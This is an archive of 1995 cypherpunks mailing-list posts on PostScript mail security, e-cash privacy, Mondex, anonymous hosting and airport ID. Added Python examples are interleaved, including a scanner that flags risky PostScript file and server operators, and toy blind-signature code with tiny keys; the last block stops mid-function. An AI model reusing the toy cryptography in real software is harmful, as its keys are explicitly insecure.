>   should at least be set to a hard-to-guess value.
>
>   Some PostScript implementations provide nonstandard facilities for
>   the direct loading and execution of machine code.  Such facilities
>   are quite obviously open to substantial abuse.  Message-sending
>   software should not make use of such features. Besides being totally
>   hardware-specific, they are also likely to be unavailable in secure
>   implementations of PostScript.  Message-receiving and -displaying
>   software should not allow such operators to be used if they exist.
>
>   PostScript is an extensible language, and many, if not most,
>   implementations of it provide a number of their own extensions. This
>   document does not deal with such extensions explicitly since they
>   constitute an unknown factor.  Message-sending software should not
>   make use of nonstandard extensions; they are likely to be missing
>   from some implementations. Message-receiving and -displaying software
>   should make sure that any nonstandard PostScript operators are secure
>   and don't present any kind of threat.
>
>   It is possible to write PostScript that consumes huge amounts of
>   various system resources. It is also possible to write PostScript
>   programs that loop infinitely.  Both types of programs have the
>   potential to cause damage if sent to unsuspecting recipients.
>   Message-sending software should avoid the construction and
>   dissemination of such programs, which is antisocial.  Message-
>   receiving and -displaying software should provide appropriate
>   mechanisms to abort processing of a document after a reasonable
>   amount of time has elapsed. In addition, PostScript interpreters
>   should be limited to the consumption of only a reasonable amount of
>   any given system resource.
>
>   Finally, bugs may exist in some PostScript interpreters which could
>   possibly be exploited to gain unauthorized access to a recipient's
>   system.  Apart from noting this possibility, there is no specific
>   action to take to prevent this, apart from the timely correction of
>   such bugs if any are found.

Hopefully this sets the record clear, once and for all with authority 
whose credentials cannot be questioned nor attacked.

I wonder though, did Netscape not know about RFC1521??

You'd expect them to, wouldn't you??




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
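
The RFC 1521 section quoted in the message above names specific operators a mail reader should disable. As an added example (not part of the original post or of the RFC), this Python sketch tokenizes a PostScript body and reports those names wherever they appear as code, ignoring comments and strings. The risk labels and the sample document are constructed for illustration. Because names can be built at run time, a clean result proves nothing: this is triage in front of the interpreter-level disabling the RFC asks for.

```python
# Added example: static triage for the operators named in RFC 1521 section 7.4.2.
# SAMPLE is a constructed document; the risk labels are this example's own.
RISKY_OPERATORS = {
    "deletefile": "file access", "renamefile": "file access",
    "filenameforall": "file access", "file": "file access",
    "exitserver": "leaves server loop", "startjob": "leaves server loop",
    "setsystemparams": "retained parameters",
    "setdevparams": "retained parameters",
}
WHITESPACE = " \t\r\n\f\0"
DELIMS = "()<>[]{}/%"


def _end_of_name(ps, i):
    """Index just past the run of regular characters starting at i."""
    while i < len(ps) and ps[i] not in WHITESPACE and ps[i] not in DELIMS:
        i += 1
    return i


def names(ps):
    """Yield (line, form, name) for each name token, skipping comments and strings."""
    i, line, n = 0, 1, len(ps)
    while i < n:
        c = ps[i]
        if c == "%":                                  # comment runs to end of line
            while i < n and ps[i] not in "\r\n":
                i += 1
        elif c == "(":                                # string: nesting and escapes
            depth, i = 1, i + 1
            while i < n and depth:
                if ps[i] == "\\":
                    i += 1                            # step onto the escaped char
                elif ps[i] == "(":
                    depth += 1
                elif ps[i] == ")":
                    depth -= 1
                if i < n and ps[i] == "\n":
                    line += 1
                i += 1
        elif ps.startswith("<~", i):                  # ASCII85 string
            end = ps.find("~>", i)
            end = n if end < 0 else end + 2
            line += ps.count("\n", i, end)
            i = end
        elif ps.startswith("<<", i) or ps.startswith(">>", i):   # dictionary marks
            i += 2
        elif c == "<":                                # hex string
            end = ps.find(">", i)
            end = n if end < 0 else end + 1
            line += ps.count("\n", i, end)
            i = end
        elif c == "/":                                # /literal or //immediate name
            form = "immediate" if ps.startswith("//", i) else "literal"
            start = i + (2 if form == "immediate" else 1)
            i = _end_of_name(ps, start)
            yield line, form, ps[start:i]
        elif c in WHITESPACE or c in DELIMS:
            if c == "\n":
                line += 1
            i += 1
        else:                                         # executable name or number
            j = _end_of_name(ps, i)
            yield line, "executable", ps[i:j]
            i = j


def scan(ps):
    """Return (line, operator, form, risk) for every risky name used as code."""
    return [(line, name, form, RISKY_OPERATORS[name])
            for line, form, name in names(ps) if name in RISKY_OPERATORS]


# Constructed sample body: the comment and the string must not be reported.
SAMPLE = "\n".join([
    "%!PS-Adobe-3.0",
    "% a comment that mentions deletefile is not code",
    "/Helvetica findfont 12 scalefont setfont",
    "72 720 moveto (text that says renamefile \\(twice\\)) show",
    "(/tmp/constructed-example) (r) file pop",
    "/startjob load pop",
    "(*) { pop } 256 string filenameforall",
    "showpage",
])

if __name__ == "__main__":
    for line, name, form, risk in scan(SAMPLE):
        print(f"line {line}: {name} ({form} name) -> {risk}")
```

Literal and immediate names are reported as well as executable ones, since a name pushed on the stack can still be looked up and executed later.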





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mjsus@atlanta.com
Date: Sun, 22 Oct 95 11:38:06 PDT
To: cypherpunks@toad.com
Subject: Interesting Newsletter - GSSN Oct 1995
Message-ID: <199510221842.OAA15920@atlanta.com>
MIME-Version: 1.0
Content-Type: text/plain



                 GLOBAL STRATEGIC SYSTEM NEWSLETTER

                          October, 1995

    Information Security System Responsibilities, Structure and Development

Is your vital business information safe or are you just assuming that this
information is safe? Have you established an adequate Information Security
System (ISS) to protect your key information against unwanted external or
internal visits and use? The changes in the usage and utilization of the
information technology have created new requirements for both the
information management and its security. However, still too often businesses
and companies do not take the information protection seriously enough to
establish proactive information security systems and other controls. If some
controls have been established, these controls often focus primarily on the
physical security instead of the company-wide information security. The
business information such as business plans, market strategies, trade
secrets and others is a very valuable organizational asset, and it would be
foolish not to initiate adequate security controls to protect this key asset
within the whole organization including physical facilities, employees,
external contractors, computers systems, contract negotiation processes and
any other business process. 

Who is responsible for the information security? Everybody. However, the
extent of this responsibility varies from one function to another or from
one person to another. Fundamentally, the top management including the
organization's CEO is responsible for establishing the information security
system. The top management is responsible for defining, documenting and
communicating the company-wide information security policy to all levels of
the organization. In addition, the executive management may establish either
specific or general information security objectives to transform the
organization from one situation to a more protected situation. The executive
management is also responsible for appointing the Information Security
Officer (ISO), who performs and acts as the Management Representative and
has the authority and responsibility to establish, implement and maintain
the information security system. All other members of the organization are
responsible for implementing the information security policy in their daily
activities. Some individuals may have additional responsibilities such as ISS
auditing and monitoring in accordance with the documented and planned
information protection arrangements. The top management is responsible for
reviewing the performance and suitability of the system periodically to
ensure its suitability and any need for revising the policy, objectives or
the system itself.

The structure of ISS is unique to each organization. The responsibilities
and authorities are different in all systems, because organizations are
unique. However, there are some general requirements that can be used to
design and develop the unique ISS for any organization, but still meet basic
and fundamental information protection requirements. These requirements can
include all or some of the following main categories: Management
Responsibility, Client / Customer Contract Security, Information Systems
Design and Development, Document and Data Control - & Configuration
Management, Purchasing Information Security, Facility Management and
Physical Security, Information Systems Management, Information Security
System Audit, Personnel and Employee Security, Legal Information Security
Matters, Counter Information Security System Activities and Information
Security Insurance Administration. Each of these general categories has
more detail and specific requirements including both documentation, activity
recording and data control requirements. Using these requirements and any
guidelines, the business can establish its unique information security
system that protects the integrity of the information effectively and
accurately.

The information security system has to be designed and then developed to
eliminate any potential security risks. This requires planning and proactive
thinking. The development can start from the Information Security Policy and
Objectives that is developed by the executive management. After this the
completed system manual can be developed by the Information Security
Officer. This ISS manual should make reference to all applicable additional
procedures and instructions that are used within the system. Typically,
these procedures (such as Information Security Disaster Plan and Procedures)
described WHOs, WHATs, WHENs, WHEREs and in some cases also HOWs such as
back-up instructions and methods. If it is necessary, additional security
plans can be developed for any specific project or process. These plans
should be consistent with an overall ISS. The masterlists or other
equivalent methods should be developed and maintained to control all ISS
plans and documentation. The planning of the information security system
provides an excellent opportunity for the management to evaluate and analyze
all information risks and design practical and useful approaches to
eliminate these risks.

Nobody should underestimate the need for the ISS, but this need should not
be artificially created either. The information security system as any
system has to be practical and really bring tangible benefits. This is one
reason why the information security assessment should be performed prior to
the development project. This assessment can identify both weaknesses and
strengths in the information security. Careful evaluations can help the
business to focus on real issues, and not to develop the system that meets
some imaginary requirements, but fails to address those key areas and
functions of the organization, where additional controls would really be
needed. The information security system should be developed for the
management, but the ISS users do also include all employees within the
organization - and as in many other organizational development, the complete
implementation of the ISS shall be dependent on the employee security and
their awareness. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 22 Oct 95 15:12:05 PDT
To: cypherpunks@toad.com
Subject: request for binary: ec211u16.exe
Message-ID: <199510222206.PAA03547@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I'm wondering if anyone has the following binary from
digicash: ec211u16.exe . If so please contact me. Thanks.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Sat, 21 Oct 95 23:33:14 PDT
To: sameer@c2.org (sameer)
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <199510220349.UAA04621@infinity.c2.org>
Message-ID: <199510220457.AA22856@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>alpha.c2.org will soon start providing anonymous web page
>services.  You can get normal webserver access (the alpha.c2.org web
>pages will be very limited) through an anonymous shell account.

>> A more cypherpunky type of application would be to enable anonymous
>> httpd's so that your clients could advertise their nice/naughty products
>> and be safe from location identification. If they had to pack up then
>> they could move to another ISP and reconnect to the anon.net as normal.
>> (Didn't I just read this in a spam HOWTO?)

>> The problem I see is when a LEA gets involved and snoops your wires and
>> traces you back to your starting point and then traces the client that is
>> supplying nasty httpd services. You wouldn't necessarily be aware of this
>> occurring either.

How do you propose to protect entities wanting to utilise this function from

a) people sniffing the tcp packets coming in to discover who is maintaining
   a web page,

b) the above LEA attack where your own lines are monitored and data is tracked
   back thru the various networks to the web page maintainer?

c) an open LEA confrontation where they issue a warrant demanding any and all
   info you have on the web page maintainer. (e.g. co$ doesn't like what's on
   one of the pages)

The same again for the anon shell accounts.

Apart from a once off mailed to you via remailer, the creator of a web page
needs to maintain their creations. This implies a means of accessing it that
is repeatable. Whether that's via a dialup account or over the net, it can be
traced. It's only when the entity uses channels outside of the jurisdiction
or capabilities of those monitoring that some anonymity can be achieved.
(Implies they weren't monitored entering the blinding channels in the first
place).

Cheers,
Mark
mark@lochard.com.au



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 22 Oct 95 14:45:35 PDT
To: cypherpunks@toad.com
Subject: Re: BlackNet in "Hardware" (fwd)
Message-ID: <199510222149.QAA02021@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



> >No book report here, but it was as gripping as the rest of her efforts.
> >It's "about" people rather than computer hackery, but the computery bits
> >were done quite well.  Does an Amiga 2000 <really> have PC and Mac
> >compatibility options?  I don't know, and it doesn't matter anyway.
> 
> I recollect that the Amiga had some gizmo--I think it was called
> "MagicSack" or something like that--that let it run Macintosh programs,
> sort of. It never really caught on, at least as an alternative to real
> Macs. And I think something similar was available for DOS. This was all
> several years back, before the Amiga faded out.
> 
> Amiga users and former Amiga users can probably tell us more.
> 

The Amiga has both hardware and software emulation of both Dos and Mac. The
hardware Mac emulator runs faster than an actual Mac. The software emulator
runs ok, but is about 2-3 times slower than an equivalent Mac.

The Amiga 2000, 3000, and 4000 have PC compliant slots that harbor a
co-computer in the guise of a bridgeboard. The software emulators pretty
much suck because they are slow.

There are currently 6 Million Amiga users, hardly 'faded out'.

The Amiga did not fail because it lacked in either hardware or software. It
failed because of market momentum and a lack of marketing savvy at Commodore.
Only somebody who has never used an Amiga for an extended time would ever
make a comment implying they were inferior in any technical way. Their
hardware architecture is still way ahead of both Windows and Mac as is their
operating system.

Just remember, nobody ever lost their job by buying IBM.

                                                   Jim Choate
                                                   CyberTects
                                                   ravage@einstein.ssz.com

 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sun, 22 Oct 95 16:20:25 PDT
To: cypherpunks@toad.com
Subject: How can e-cash, even on-line cleared, protect payee identity?
Message-ID: <199510222320.RAA27764@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Well I've decided that the best way to learn is to stick my neck out
and say something probably stupid in public.  So here I go again:


In an on-line clearing e-cash scheme, Chaum's "double-spender
identifier" fields are unnecessary, but a "serial number" type field
to uniquely identify the e-coin is still necessary.  Using blinding,
this serial number may be unknown to the bank, but it will be known
to the payer.  If the payer and the bank are collaborating to
identify the payee, then they can simply use this serial number to
identify the recipient of the coin.


Is there a scheme which will prevent this collusive payee 
identification, and if so where can I read about it?  (On-line is 
preferable of course, but I don't expect to be that fortunate.)


Now even if it were the case that the payee is always identifiable
by a collusion of the bank and the payer (such as is the case in
DigiCash Ecash), all this means is that you shouldn't accept a coin
using one nym, and deposit it in the bank using another.  You need
one bank account per nym, as well as one bank account per
anonymous transaction, and then you have complete control over
revelation of your identit(y/ies).


I can imagine a future in which this requirement is not difficult to
meet.  Perhaps it will be the case that you can accept a coin, open
up a new ("anonymous") account with the bank, deposit the coin, 
withdraw a new coin of the same amount, close the account, and now 
have an untraceable coin all in a fraction of a second.


Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMIrRpvWZSllhfG25AQFWTQQAgxDWvYrBpoM5D0Idn7ZeCHbZSxMGFr50
Ut40sE83Yfctb6nJdrA+trpynEcu1wJkBbZ7zKDw/TFEUHZy1v4lhZPe+yxmYZcD
w9fPC5HaJQqcTp/hhiw9L4iMswdbrmJu/SkUz85ZVosy8blasdOgFwcoZTIFpZHk
tyATeEGYygo=
=xqJ6
-----END PGP SIGNATURE-----
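
The collusion described in the message above, as an added example that is not part of the original post: a toy Chaum-style RSA blind signature in Python. The bank acting alone cannot match a deposited coin to a withdrawal, but a payer who hands over the serial it chose lets the bank name the depositing account. The second scenario models the one-time-account exchange proposed in the post's last paragraph. The primes, account names and hash-to-integer mapping are constructed assumptions, far too small for real use.

```python
import hashlib
import secrets
from math import gcd

# Toy RSA parameters for the bank (constructed; far too small for real use).
P, Q, E = 104729, 1299709, 65537


def h(serial, n):
    """Hash a coin serial number to an integer mod n."""
    return int.from_bytes(hashlib.sha256(serial.encode()).digest(), "big") % n


class Bank:
    def __init__(self):
        self.n = P * Q
        self._d = pow(E, -1, (P - 1) * (Q - 1))   # private signing exponent
        self.withdrawal_log = []   # (account, blinded value) seen at withdrawal
        self.deposit_log = {}      # serial -> account that deposited the coin

    def sign_blinded(self, account, blinded):
        self.withdrawal_log.append((account, blinded))
        return pow(blinded, self._d, self.n)

    def valid(self, serial, sig):
        return pow(sig, E, self.n) == h(serial, self.n)

    def deposit(self, account, serial, sig):
        """On-line clearing: the signature must verify and the serial be unspent."""
        if not self.valid(serial, sig) or serial in self.deposit_log:
            return False
        self.deposit_log[serial] = account
        return True

    def withdrawers_matching(self, serial):
        """Bank alone: withdrawal records that match a deposited serial."""
        m = h(serial, self.n)
        return [acct for acct, blinded in self.withdrawal_log if blinded == m]

    def depositor_of(self, serial):
        """Bank plus payer: the payer supplies the serial it chose."""
        return self.deposit_log.get(serial)


def withdraw(bank, account):
    """Holder side: choose a serial, blind its hash, get it signed, unblind."""
    n = bank.n
    while True:
        serial = secrets.token_hex(8)
        m = h(serial, n)
        r = secrets.randbelow(n - 2) + 2          # blinding factor, 2 <= r < n
        if gcd(m, n) == 1 and gcd(r, n) == 1:
            break
    signed = bank.sign_blinded(account, m * pow(r, E, n) % n)
    return serial, signed * pow(r, -1, n) % n     # (m * r^e)^d * r^-1 = m^d mod n


def scenario(one_time_account):
    """Payer withdraws a coin, pays the payee, payee clears it on-line."""
    bank = Bank()
    serial, sig = withdraw(bank, "payer-acct")    # the payer knows this serial
    payee_acct = "one-time-acct" if one_time_account else "payee-main-acct"
    result = {
        "accepted": bank.deposit(payee_acct, serial, sig),
        "replay_accepted": bank.deposit("other-acct", serial, sig),
        "bank_alone_finds_payer": bank.withdrawers_matching(serial),
        "collusion_finds_payee": bank.depositor_of(serial),
    }
    if one_time_account:
        # Exchange step from the post: withdraw a fresh blinded coin from the
        # throwaway account; its serial is known only to the payee.
        fresh_serial, fresh_sig = withdraw(bank, payee_acct)
        result["fresh_coin_valid"] = bank.valid(fresh_serial, fresh_sig)
        result["fresh_coin_matches"] = bank.withdrawers_matching(fresh_serial)
    return result


if __name__ == "__main__":
    for flag in (False, True):
        print(flag, scenario(flag))
```

With the one-time account, collusion still resolves the payer's serial, but only to the throwaway account, which protects the payee only if nothing else ties that account to them.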




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 22 Oct 95 17:48:51 PDT
To: cypherpunks@toad.com
Subject: Real ECash from Mark Twain Bank
Message-ID: <199510230047.RAA17045@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


<URL:http://www.marktwain.com/ecash.html> will apparently have info on
its "real ecash" starting late Sunday, October 22.  It is not there yet
at 6 PM pacific time.

<URL:http://digicash.support.nl/publish/ec_pres3.html> will have a press
release soon, as well.  Here is what it says now:

> First Real Electronic Cash Launched
> 
> Copyright (c) 1995 by DigiCash bv. 
> 
> FOR IMMEDIATE RELEASE (Release Date: October 23, 1995)
> 
>       This page will be available very soon. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Sun, 22 Oct 95 18:45:43 PDT
To: cypherpunks@toad.com
Subject: Re: Mondex vs. Digicash (was: Godzilla vs. Mothra)
Message-ID: <v03003701acb03ca16f26@[198.93.25.98]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:35 22.10.95, Douglas Barnes wrote:

>   If the Digicash system allows people to set up their
>   accounts without getting out of their chairs (which I suspect will
>   be the case, if they do it right), it will initially get more
>   adopters.

Agreed, especially since it's going to be a while until Mondex, NetBill
et al are accessible by consumers outside of the trial areas.

I wonder whether this DigiCash announcement will be a limited trial or
a full-blown deployment.

>   I know at least one group of people who believe they have a good line
>   on a serious security problem in Mondex.

Mondex is definitely practicing security by obscurity. Tim Jones,
Mondex's CEO, was very cagey last week at the e-commerce conference
about how transaction mechanics work and where various public and private
keys reside. I have serious questions about some aspects of Mondex's
security.

> o Even if the Mondex hardware were given away for free, think how
>   much fun it is for the average user to add a new piece of hardware
>   to their machines... ever install a sound card and CD-ROM drive on
>   a PC? I remember reading something like 20% of all "multimedia"
>   kits were returned, largely due to user install problems. If there
>   is a competing method that costs the same and _doesn't_ require
>   the hardware, people will tend to go with this.

Depends on the hardware. I recently saw a pamphlet for a mag-stripe +
smart card reader with a numeric keyboard for PIN entry that plugs into
a PC as a bump in the wire between the keyboard and the CPU. The
company is in Arizona; I can't recall the name offhand.

Adding smart card capability to a PC is not in the same league of user
hassle as a multimedia upgrade. It's also much cheaper.

>   but if you explain that the money uses existing (auditable)
>   channels going in, and existing (auditable) channels going out, and
>   that only spenders are anonymous, they relax considerably. They may
>   change their minds later, but we're about to get an existence proof.

The problem is with peer-to-peer transactions that don't go through a
bank. Mondex claims that such transactions are anonymous and unaudited.
What would stop someone from moving a 500 pound per-card maximum from
one card to the next and then back up into the system elsewhere? I'm
under the impression that Mondex's value isn't serialized the way
DigiCash's is, so you can't track the value itself. And if the cards
themselves keep no records of transactions made with peer devices,
tracking seems rather tricky.

>   how can you be so sure that Mondex will win over
>   Digicash, and that they won't co-exist like, say, money orders,
>   currency and cashier's checks (three instruments with both similar
>   and dissimilar attributes)?

The different schemes have enough overlap that it's not clear to me
that a single bank will want to support multiple as yet untried
systems. Admittedly, we haven't yet seen which bank is working with
DigiCash, but Mondex has some pretty heavy hitters behind it already.
Since DigiCash is Internet-focused and Mondex is a non-net-specific
system that can be adapted for use over the Net, it seems to me that a
bank adopting Mondex would get more out of its investment than if it
bought into DigiCash. Banks are going to get into some kind of e-cash
system sooner than later, and Mondex seems to be the farthest along.

_______________________________________________________________________
Stephan Somogyi               Senior Editor               Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 22 Oct 95 16:09:26 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: airport security
In-Reply-To: <acaf1d35530210046717@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.951022185941.11657A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> The recent push is certainly associated with the various terrorist threats

   Furthermore, the terrorism the West faces, is state-sponsored. Neither 
of its patrons - the Russians and the Radical Arabs - are stupid. If the 
airlines become secured, they _will_ target the Greyhounds.

One need only examine US policy towards (just as one example) Turkey in 
the last five years, to realize that the Washington Elites are not 
capable of understanding fundamental problems of statecraft and 
diplomacy. Under this regime, it is no wonder that our reaction to terror 
tactics, is to react in a defensive mode - expensive airport security 
measures, etc, etc. The other side *has already won* the terror war, 
merely by virtue of having set the agenda, and making us spin in tighter 
and tighter circles - reacting, not initiating.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 22 Oct 95 16:17:17 PDT
To: attila <attila@primenet.com>
Subject: Re: airport security
In-Reply-To: <Pine.BSD.3.91.951022120147.4986A-100000@usr4.primenet.com>
Message-ID: <Pine.SV4.3.91.951022191152.11657C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


>  I have been foregoing the 
> IRS deductions for my 5 children since I refuse to obtain SSNs for them. 

    You need a better lawyer. You do have a statutory right to those
deductions, and the IRS administrative policies do yield to statutory law.

Hint: IRS can write anything it wants, in "instructions for Form XXXX" -
these leaflets do not have force of law. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: farber@central.cis.upenn.edu (David Farber)
Date: Sun, 22 Oct 95 16:24:22 PDT
To: Alan Horowitz <tcmay@got.net>
Subject: Re: airport security
Message-ID: <v02140310acb082c93d4e@[130.91.88.102]>
MIME-Version: 1.0
Content-Type: text/plain


Ever think that the one real payoff for the ID at airports
is to kill the market for re-sold frequent flyer
certificates and partially used tickets that then get sold
to others (like at most schools)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 22 Oct 95 19:53:46 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
Message-ID: <199510230252.TAA08620@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:46 AM 10/22/95 -0400, MDresser@aol.com wrote:
> Generalizing about
> reporters is about as intellectually valid as generalizing about hackers.

On the contrary:  Hackers are self selected, and so are 
very diverse.

Reporters are selected from above by an incestuous elite who 
have their hands in each other's pockets, and so are very homogenous.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sun, 22 Oct 95 18:45:02 PDT
To: ecm@ai.mit.edu
Subject: hot news at DigiCash
Message-ID: <199510230144.TAA00341@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Hot news at DigiCash.  One, a real live bank is going to be issuing
Ecash denominated in U.S. dollars.  See "http://www.digicash.com/" and
"http://www.marktwain.com/".


Two, the one million trial cyberbucks have been issued and no more 
will be issued, although the First Digital Bank will continue to 
run the trial for now.  In honor of the occasion I hereby offer


E=100 US=$8.00 SELL-OFFER "Sun Oct 22 19:34:28 MDT 1995" 2 bryce@colorado.edu


Pretty soon we'll be able to exchange First Digital Bank trial 
cyberbucks for Mark Twain Bank cyberbucks denominated in U.S. Dollars.
I wonder if our trial cyberbucks will be considered collector's items?
I know that I will always be proud of *mine*...


Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Sun, 22 Oct 95 16:54:17 PDT
To: cypherpunks@toad.com
Subject: Re: airport security
Message-ID: <yDDeDD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Alan Horowitz <alanh@infi.net> writes:

> measures, etc, etc. The other side *has already won* the terror war, 
> merely by virtue of having set the agenda, and making us spin in tighter 
> and tighter circles - reacting, not initiating.

What, then?


--
                        WebCasters(tm)
James C. Grubs                             jgrubs@webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 22 Oct 95 19:55:36 PDT
To: cypherpunks@toad.com
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510222320.RAA27764@nagina.cs.colorado.edu>
Message-ID: <199510230253.TAA08888@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Bryce <wilcoxb@nagina.cs.colorado.edu> writes:
>In an on-line clearing e-cash scheme, Chaum's "double-spender
>identifier" fields are unnecessary, but a "serial number" type field
>to uniquely identify the e-coin is still necessary.  Using blinding,
>this serial number may be unknown to the bank, but it will be known
>to the payer.  If the payer and the bank are collaborating to
>identify the payee, then they can simply use this serial number to
>identify the recipient of the coin.
>
>Is there a scheme which will prevent this collusive payee 
>identification, and if so where can I read about it?  (On-line is 
>preferable of course, but I don't expect to be that fortunate.)

One proposal I have seen here is to have a "coin changer" service which
turns the received coin in at the bank for you. Then the payer and the
bank and the coin changer all have to collude to identify you.  However
you have to trust the coin changer not to steal your money.  So it better
be a pretty trustworthy organization.

>Now even if it were the case that the payee is always identifiable
>by a collusion of the bank and the payer (such as is the case in
>DigiCash Ecash), all this means is that you shouldn't accept a coin
>using one nym, and deposit it in the bank using another.  You need
>one bank account per nym, as well as one bank account per
>anonymous transaction, and then you have complete control over
>revelation of your identit(y/ies).

It would still be less than perfect to have all of a given nym's
transactions known.  In an ideal electronic cash system no transactions
are linkable if the participants don't want it.

>I can imagine a future in which this requirement is not difficult to
>meet.  Perhaps it will be the case that you can accept a coin, open
>up a new ("anonymous") account with the bank, deposit the coin, 
>withdraw a new coin of the same amount, close the account, and now 
>have an untraceable coin all in a fraction of a second.

In such a system you don't need an "account" as such, but rather the bank
simply allows used cash to be checked and exchanged for fresh cash via
anonymous connections.  This would be the most privacy-protecting system.

Hal
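
The collusion Bryce asks about and the account-less exchange Hal describes, as an added example that is not part of either message: a toy Chaum-style RSA blind signature in which the payer hands the bank the serial number she chose. The bank key is constructed and far too small for real use, and the `Bank` class, its `exchange` method and the account names are assumptions made for illustration.

```python
import hashlib
import secrets
from math import gcd

# Constructed toy bank key built from two Mersenne primes; far too small for real use.
P, Q = 2**31 - 1, 2**61 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # bank's private exponent


def digest(serial: bytes) -> int:
    """Stand-in for a full-domain hash: map a coin serial number into Z_N."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


class Bank:
    def __init__(self):
        self.withdrawals = []   # (account, blinded value) as seen at withdrawal
        self.spent = {}         # serial -> who turned the coin in

    def sign_blinded(self, account, blinded):
        self.withdrawals.append((account, blinded))
        return pow(blinded, D, N)

    def _accept(self, serial, sig, who):
        if pow(sig, E, N) != digest(serial):
            raise ValueError("bad signature")
        if serial in self.spent:
            raise ValueError("double spend")
        self.spent[serial] = who

    def deposit(self, serial, sig, account):
        """On-line clearing into a named account."""
        self._accept(serial, sig, account)

    def exchange(self, serial, sig, blinded_new):
        """Hal's variant: swap a used coin for a fresh one, no account involved."""
        self._accept(serial, sig, "anonymous connection")
        return pow(blinded_new, D, N)


def blind(serial):
    """Return (blinded value, blinding factor r) for a serial number."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            return digest(serial) * pow(r, E, N) % N, r


def unblind(signed, r):
    """Strip the blinding factor, leaving the bank's signature on digest(serial)."""
    return signed * pow(r, -1, N) % N


def withdraw(bank, account):
    serial = secrets.token_bytes(16)
    blinded, r = blind(serial)
    return serial, unblind(bank.sign_blinded(account, blinded), r)


def run_scenarios():
    out = {}

    # 1. Direct deposit: Alice pays Bob, Bob deposits into his own account.
    bank = Bank()
    serial, sig = withdraw(bank, "alice")
    bank.deposit(serial, sig, "bob")
    # Blinding works: nothing the bank saw at withdrawal matches the deposited coin.
    out["bank_alone_links_alice"] = any(b == digest(serial) for _, b in bank.withdrawals)
    # Collusion: Alice hands the bank the serial she chose, the bank looks it up.
    out["collusion_direct"] = bank.spent[serial]

    # 2. Exchange first: Bob swaps Alice's coin for a fresh blinded coin.
    bank = Bank()
    serial, sig = withdraw(bank, "alice")
    new_serial = secrets.token_bytes(16)
    blinded, r = blind(new_serial)
    new_sig = unblind(bank.exchange(serial, sig, blinded), r)
    bank.deposit(new_serial, new_sig, "bob")
    # Alice's serial now leads only to the exchange, not to Bob's account.
    out["collusion_after_exchange"] = bank.spent[serial]
    out["fresh_coin_valid"] = pow(new_sig, E, N) == digest(new_serial)

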